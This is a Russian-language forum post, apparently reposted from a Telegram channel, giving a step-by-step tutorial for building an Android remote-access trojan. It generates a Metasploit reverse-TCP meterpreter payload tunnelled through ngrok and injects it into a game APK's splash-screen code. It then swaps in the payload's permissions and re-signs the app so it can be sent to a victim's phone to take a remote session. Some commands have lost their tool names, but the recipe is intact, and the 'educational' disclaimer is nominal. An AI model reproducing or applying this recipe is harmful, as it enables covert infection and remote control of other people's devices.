• Что-бы увидеть скрытые разделы и познать все тайны форума, Вам необходимо Зарегистрироваться или Войти.
  • Сюда попадают темы НЕ ПРОШЕДШИЕ ПРОВЕРКУ или темы, которые нарушают правила форума. Не советуем покупать здесь что-либо!

Как создать вирус удаленного доступа на Android

Статус
В этой теме нельзя размещать новые ответы.

Ioney

Новичок
Статус
offline
Регистрация
16.11.2019
Сообщения
2
Репутация
1
Как создать вирус удаленного доступа на Android?

7cb1aa4688c54a5e7f90c.png


Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.
Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.
Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия!
Инструкция
Устанавливаем Kali Linux.
Далее установим Zipalign

apt-get install -y zipalign

Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit.

Сборка бекдора
Запускаем в отдельном окне ngrok

tcp 4444

Полученные lhost и lport используем для создания пейлоада

-p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apk

На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд

d game.apk
apktool d payload.apk

Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем

{p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.

Компилируем отредактированный файл игры в apk

b game

Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой

-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000

Получаем файл key.keystore. Теперь сертифицируем наш apk

-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered

Выравниваем подписанное приложение командой

-v 4 game.apk game_good.apk

Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.


Скопипастил с телеграм канала, сам почитал хз зачем, но интересно)
 
Статус
В этой теме нельзя размещать новые ответы.